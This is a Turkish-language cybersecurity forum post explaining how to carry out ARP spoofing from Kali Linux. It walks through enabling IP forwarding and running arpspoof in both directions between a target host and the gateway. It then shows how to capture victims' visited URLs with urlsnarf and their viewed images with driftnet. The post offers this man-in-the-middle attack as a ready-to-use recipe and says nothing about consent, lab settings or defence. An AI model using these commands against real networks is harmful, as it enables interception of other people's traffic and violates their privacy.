You need to enable JavaScript to run this app.

Skip to main content

Kali linux arp spoof nasıl yapılır

Administrator
Merhaba, kali linuxta arp spoof nasıl yapılır diye bir konu açıp nasıl yapıldığını açıklamak istedim. Olay şu: bir tarafa ben bu adresim diyorsun ardından diğer tarafada ben şu adresim diyorsun artık birbirleri ile konuşmaya çalışırken senden konuşuyorlar. İkiside otomatik olarak bu işlemleri yapmaya ayarlandıklarından dolayı direkt her ben buyum diyene inanıyorlar. 
Kodlar şu şekilde:
Bize gelen yönlendirmeleri yapabilmek için 

Kod:
ifconfig
yazarak kullandığımız arayüzün ne olduğunu görüyoruz öncelikle ( wlan0 , eth0 ) vs vs gibi

Kod:
cat /proc/sys/net/ipv4/ip_forward 
 yazıyoruz, eğer 0 yazarsa false demek yani hatalı, yani ayarlanmamış,  bundan dolayı 
Kod:
echo 1 > /proc/sys/net/ipv4/ip_forward
yada
cat  /proc/sys/net/ipv4/ip_forward   yazıp içine 1 yazıyoruz
Kod:
cat /proc/sys/net/ipv4/ip_forward 
tekrar bunu yazdığımızda artık 1 yazıyor olmalı , cat komutu içindeki dosyayı okutur ve ekrana yazar.

daha sonra şu iki komutu yazıyor ve oluyor, ikisinede tek tek ben buyum ben şuyum diyerek mesaj gönderiyoruz, birbirlerini biz sanıyorlar.

Kod:
arpspoof -i [AĞ ARAYÜZÜ] -t [HEDEF IP] [AĞ CİHAZI IP]
arpspoof -i [AĞ ARAYÜZÜ] -t [AĞ CİHAZI IP] [HEDEF IP]
farkettiyseniz tam tersi adresler yazıyoruz çünkü birbirlerini biz sanmalılar. 

Bağlantıyı üzerimizden geçirebiliyorsak üzerimizden giden istekleri dinleyelim, bunun için farklı şeyler olsada, en basiti şu
Kod:
urlsnarf –i [AĞ ARAYÜZÜ]
url adreslerini görüntülemek için bu

driftnet -i [AĞ ARAYÜZÜ]
resimleri görüntülemek için bu

İçerik sağlayıcı paylaşım sitesi olarak hizmet veren Siber Güvenlik Forumu sitemizde 5651 sayılı kanunun 8. maddesine ve T.C.K'nın 125. maddesine göre tüm üyelerimiz yaptıkları paylaşımlardan kendileri sorumludur. Sitemiz hakkında yapılacak tüm hukuksal şikayetleri İletişim bağlantısından bize ulaşıldıktan en geç 3 (üç) gün içerisinde ilgili kanunlar ve yönetmenlikler çerçevesinde tarafımızca incelenerek, gereken işlemler yapılacak ve site yöneticilerimiz tarafından bilgi verilecektir.